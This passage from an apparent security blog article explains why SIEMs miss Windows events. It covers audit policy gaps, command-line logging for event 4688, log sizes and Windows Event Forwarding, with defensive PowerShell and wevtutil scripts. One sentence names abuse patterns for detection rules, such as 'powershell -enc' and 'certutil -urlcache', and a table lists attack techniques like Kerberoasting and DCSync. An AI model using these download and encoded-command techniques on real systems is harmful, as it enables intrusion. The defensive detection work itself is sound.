Logon/Logoff Events               No Auditing    ← PROBLEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Object Access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   File System                             No Auditing    ← May be intentional (too noisy)</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Registry                                No Auditing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   SAM                                     No Auditing    ← PROBLEM on DCs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Certification Services                  No Auditing    ← ADCS attacks invisible</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Detailed File Share                     No Auditing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   File Share                              No Auditing    ← Lateral movement via shares</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Privilege Use</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Sensitive Privilege Use                 No Auditing    ← PROBLEM: SeDebugPrivilege, etc.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Non Sensitive Privilege Use             No Auditing    ← Usually intentional (noisy)</span><br></span></code></pre></div></div>\n<p>Scripted audit across your fleet:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Collect audit policy from multiple remote machines and compare against baseline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetHosts = @(\"DC01\", \"DC02\", \"SERVER01\", \"WSADMIN01\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($host in $targetHosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $output = Invoke-Command -ComputerName $host -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $raw = auditpol /get /category:* /r  # CSV format</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $raw | ConvertFrom-Csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        foreach ($row in $output) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $results += [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">                ComputerName  = $host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Category      = $row.'Category/Subcategory'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Setting       = $row.'Inclusion Setting'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"Failed to query $host : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find hosts where \"Credential Validation\" is NOT audited</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.Category -like \"*Credential Validation*\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.Setting -eq \"No Auditing\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Select-Object 
ComputerName, Category, Setting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export full comparison</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results | Export-Csv \"audit_policy_fleet.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"23-the-subcategories-that-must-be-enabled-and-why\">2.3 The Subcategories That Must Be Enabled (And Why)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#23-the-subcategories-that-must-be-enabled-and-why\" class=\"hash-link\" aria-label=\"Direct link to 2.3 The Subcategories That Must Be Enabled (And Why)\" title=\"Direct link to 2.3 The Subcategories That Must Be Enabled (And Why)\" translate=\"no\">​</a></h3>\n<p>The following table maps the subcategories most critical for detection to the specific attack techniques they cover. 
This is the minimum baseline for a detection-capable environment:</p>\n<table><thead><tr><th>Subcategory</th><th>Event IDs</th><th>Covers</th><th>Default State</th></tr></thead><tbody><tr><td>Credential Validation</td><td>4776, 4768, 4771</td><td>NTLM auth, Kerberos TGT, pre-auth failure</td><td>❌ Disabled on many systems</td></tr><tr><td>Kerberos Service Ticket Operations</td><td>4769</td><td>Kerberoasting, silver ticket</td><td>⚠ Success only (miss failures)</td></tr><tr><td>Process Creation</td><td>4688</td><td>All process executions</td><td>❌ Disabled by default</td></tr><tr><td>Process Termination</td><td>4689</td><td>Timeline reconstruction</td><td>❌ Disabled by default</td></tr><tr><td>DPAPI Activity</td><td>4693, 4694</td><td>Credential decryption by malware</td><td>❌ Disabled by default</td></tr><tr><td>Special Logon</td><td>4672</td><td>Admin-equivalent logon (SeDebug, etc.)</td><td>❌ Disabled on many systems</td></tr><tr><td>Sensitive Privilege Use</td><td>4673, 4674</td><td>Privilege escalation evidence</td><td>❌ Disabled by default</td></tr><tr><td>Security Group Management</td><td>4728, 4732, 4756</td><td>Group membership changes</td><td>✅ Enabled on DCs</td></tr><tr><td>Directory Service Access</td><td>4661, 4662</td><td>DCSync, object access on AD</td><td>⚠ Often disabled (high volume)</td></tr><tr><td>Directory Service Changes</td><td>5136, 5137, 5141</td><td>AD object creation/modification</td><td>⚠ Sometimes disabled</td></tr><tr><td>Audit Policy Change</td><td>4719</td><td>Someone changing audit policy</td><td>⚠ Often disabled</td></tr><tr><td>Filtering Platform Connection</td><td>5156, 5158</td><td>Network connections per process</td><td>❌ Disabled (extremely noisy)</td></tr><tr><td>Other Object Access</td><td>4698, 4700, 4702</td><td>Scheduled task creation</td><td>❌ Disabled on many systems</td></tr></tbody></table>\n<p><strong>Critical: enabling Process Creation (4688) with command-line logging</strong></p>\n<p>Event 4688 logs process 
creation, but without an additional registry setting, the command line is NOT included, making the event largely useless for detecting LOLBin abuse, PowerShell attacks, or anything that relies on command-line arguments:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable command-line logging in process creation events (4688)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This must be set SEPARATELY from the audit policy subcategory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$registryPath = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not (Test-Path $registryPath)) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    New-Item -Path $registryPath -Force | Out-Null</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-ItemProperty -Path $registryPath `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Name \"ProcessCreationIncludeCmdLine_Enabled\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Value 1 -Type 
DWord</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify the setting applied:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ItemProperty -Path $registryPath -Name \"ProcessCreationIncludeCmdLine_Enabled\"</span><br></span></code></pre></div></div>\n<p>Without this registry value, you will see 4688 events with <code>CommandLine: -</code>, an empty command line. Every rule you write for detecting <code>powershell -enc</code>, <code>certutil -urlcache</code>, or <code>wmic</code> abuse will silently never fire.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--log-size-the-most-common-cause-of-overwriting\">Part 3 - Log Size: The Most Common Cause of Overwriting<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-3--log-size-the-most-common-cause-of-overwriting\" class=\"hash-link\" aria-label=\"Direct link to Part 3 - Log Size: The Most Common Cause of Overwriting\" title=\"Direct link to Part 3 - Log Size: The Most Common Cause of Overwriting\" translate=\"no\">​</a></h2>\n<p>The default log sizes for Windows security channels are laughably inadequate for enterprise environments with active security audit policies:</p>\n<table><thead><tr><th>Log Channel</th><th>Windows Default Max Size</th><th>Events Per Day (busy DC)</th><th>Retention at Default</th></tr></thead><tbody><tr><td>Security</td><td>20 MB</td><td>500,000–2,000,000+</td><td>&lt; 1 hour</td></tr><tr><td>System</td><td>20 MB</td><td>10,000–50,000</td><td>8–24 hours</td></tr><tr><td>Application</td><td>20 MB</td><td>5,000–20,000</td><td>1–3 days</td></tr><tr><td>PowerShell/Operational</td><td>15 MB</td><td>20,000–200,000</td><td>1–4 
hours</td></tr><tr><td>Sysmon/Operational</td><td>20 MB</td><td>200,000–1,000,000+</td><td>Minutes</td></tr></tbody></table>\n<p>A busy domain controller generating 1 million Security events per day will overwrite its 20MB Security log roughly every 2 minutes.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-setting-appropriate-log-sizes\">3.1 Setting Appropriate Log Sizes<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#31-setting-appropriate-log-sizes\" class=\"hash-link\" aria-label=\"Direct link to 3.1 Setting Appropriate Log Sizes\" title=\"Direct link to 3.1 Setting Appropriate Log Sizes\" translate=\"no\">​</a></h3>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Security log to 4GB (recommended for DCs with active audit policies)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Security /ms:4294967296</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Sysmon operational log to 2GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Microsoft-Windows-Sysmon/Operational /ms:2147483648</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" 
style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set PowerShell operational log to 1GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Application log to 500MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Application /ms:524288000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set System log to 500MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl System /ms:524288000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Verify the change took effect:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil gl Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Output includes:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: maxSize: 4294967296</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: retention: false    ← \"false\" = 
overwrite as needed (correct setting)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: autoBackup: false</span><br></span></code></pre></div></div>\n<p>Deploying via GPO (the right way to do this at scale):</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GPO Path: Computer Configuration → Administrative Templates → </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Windows Components → Event Log Service → Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Specify the maximum log file size (KB)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: 4194304   (= 4GB for DCs)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       1048576   (= 1GB for servers)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       512000    (= 500MB for workstations)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Control Event Log behavior 
when the log file reaches its maximum size\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: NOT configured (leave default overwrite behavior)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       [Do NOT set \"Do not overwrite events\" unless you have extremely fast collection]</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-checking-current-log-status-across-your-fleet\">3.2 Checking Current Log Status Across Your Fleet<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#32-checking-current-log-status-across-your-fleet\" class=\"hash-link\" aria-label=\"Direct link to 3.2 Checking Current Log Status Across Your Fleet\" title=\"Direct link to 3.2 Checking Current Log Status Across Your Fleet\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Inventory log sizes, fill percentage, and oldest retained event across hosts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$hosts = @(\"DC01\", \"DC02\", \"SERVER01\", \"SERVER02\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$logNames = @(\"Security\", \"System\", \"Microsoft-Windows-Sysmon/Operational\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">              \"Microsoft-Windows-PowerShell/Operational\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($computer in $hosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    foreach ($logName in $logNames) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $log = Invoke-Command -ComputerName $computer -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                param($ln)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $l = Get-WinEvent -ListLog $ln -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                if ($l) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        LogName       = $l.LogName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        MaxSizeMB     = [math]::Round($l.MaximumSizeInBytes / 1MB, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        
CurrentSizeMB = [math]::Round($l.FileSize / 1MB, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        FillPct       = [math]::Round(($l.FileSize / $l.MaximumSizeInBytes) * 100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        RecordCount   = $l.RecordCount</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        IsEnabled     = $l.IsEnabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        OldestRecord  = if ($l.RecordCount -gt 0) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                            (Get-WinEvent -LogName $ln -MaxEvents 1 -Oldest -ErrorAction SilentlyContinue).TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        } else { $null }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            } -ArgumentList $logName -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($log) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $log | Add-Member -NotePropertyName 
ComputerName -NotePropertyValue $computer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $report += $log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } catch {}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Flag any log retaining less than 24 hours of events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.OldestRecord -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ((Get-Date) - $_.OldestRecord).TotalHours -lt 24</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Select-Object ComputerName, LogName, MaxSizeMB, FillPct, OldestRecord |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export full report</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report | Export-Csv \"log_inventory.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--windows-event-forwarding-the-pipeline-that-silently-drops-events\">Part 4 - Windows Event Forwarding: The Pipeline That Silently Drops Events<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-4--windows-event-forwarding-the-pipeline-that-silently-drops-events\" class=\"hash-link\" aria-label=\"Direct link to Part 4 - Windows Event Forwarding: The Pipeline That Silently Drops Events\" title=\"Direct link to Part 4 - Windows Event Forwarding: The Pipeline That Silently Drops Events\" translate=\"no\">​</a></h2>\n<p>For organizations using WEF/WEC rather than or in addition to a SIEM agent, the forwarding pipeline introduces additional failure modes that are largely invisible without explicit monitoring.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"41-wef-architecture-and-the-subscription-model\">4.1 WEF Architecture and the Subscription Model<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#41-wef-architecture-and-the-subscription-model\" class=\"hash-link\" aria-label=\"Direct link to 4.1 WEF Architecture and the Subscription Model\" title=\"Direct link to 4.1 WEF Architecture and the Subscription Model\" translate=\"no\">​</a></h3>\n<p>WEF uses WinRM (port 5985 HTTP / 5986 HTTPS) to transport events from source machines to a Windows Event Collector (WEC) server. The flow:</p>\n<!-- -->\n<p><strong>The bookmark mechanism, and how it fails:</strong></p>\n<p>WEC maintains a bookmark per source machine per subscription, tracking the last EventRecordID successfully forwarded. When a source reconnects after going offline, forwarding resumes from the bookmark. 
This sounds reliable. It has two critical failure modes:</p>\n<ol>\n<li class=\"\"><strong>The source's local log overwrote the bookmarked position.</strong> If the source was offline and its Security log overwrote itself before reconnecting, the WEC resumes from the bookmark, which no longer exists in the log. Events between last bookmark and current position are silently lost. The WEC receives no notification that a gap exists.</li>\n<li class=\"\"><strong>The bookmark itself is in the WEC registry and can be corrupted.</strong> If the WEC server crashes or the registry becomes inconsistent, bookmarks reset, causing either duplicate or missed events.</li>\n</ol>\n<p>Microsoft's own documentation acknowledges this explicitly:</p>\n<blockquote>\n<p>\"When the event log overwrites existing events (resulting in data loss if the device isn't connected to the Event Collector), there's no notification sent to the WEF collector that events are lost from the client. Neither is there an indicator that there was a gap encountered in the event stream.\"</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-the-three-wef-delivery-optimization-modes\">4.2 The Three WEF Delivery Optimization Modes<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#42-the-three-wef-delivery-optimization-modes\" class=\"hash-link\" aria-label=\"Direct link to 4.2 The Three WEF Delivery Optimization Modes\" title=\"Direct link to 4.2 The Three WEF Delivery Optimization Modes\" translate=\"no\">​</a></h3>\n<p>WEF offers three delivery modes that trade latency for reliability. 
Most organizations leave the default, which is optimized for the wrong scenario:</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View current subscription configuration</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gs \"BaselineSubscription\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: The \"ConfigurationMode\" field selects the delivery mode (it sets Delivery MaxLatencyTime and Heartbeat Interval):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Normal     (default): 15 minutes delivery delay. 
